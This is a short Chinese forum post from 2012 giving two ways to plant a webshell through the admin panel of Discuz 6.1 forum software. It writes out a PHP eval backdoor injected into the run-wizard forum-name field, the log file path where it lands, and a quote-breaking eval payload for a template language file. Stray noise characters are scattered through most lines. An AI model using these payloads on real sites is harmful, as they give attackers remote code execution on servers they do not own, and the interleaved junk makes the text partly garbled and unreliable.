discuz6.1两种方法后台拿shell0 w" o" T# V8 P! N# @/ y5 T
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
. `8 y; i, V X5 V& p. B- e& E( N1:5 C+ l' m% H4 l* [/ i2 P
http://127.0.0.1/discuz/admincp. ... zard&frames=yes6 \8 l4 [: {3 v: V+ d/ r7 u
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
9 r& O0 d, }8 f* s5 V1 f<?php eval($_POST[cmd]);?>1 o" A" h8 b4 ~/ S
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php0 V) V/ X/ p3 G* ^
$ w/ l; k# K' P
- e2 z# R9 g5 v, w; g2 i, ?& M! [! |2:后台模板管理--默认模板套系--详情
, b% b$ m/ ~% V8 ftemplates/default/actions.lang.php
: c$ h/ j4 J& Ujhackj\\');eval($_POST[cmd])?>;//
* v4 m" _! p- @1 | G- [: K3 B) u( h2 U9 p
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对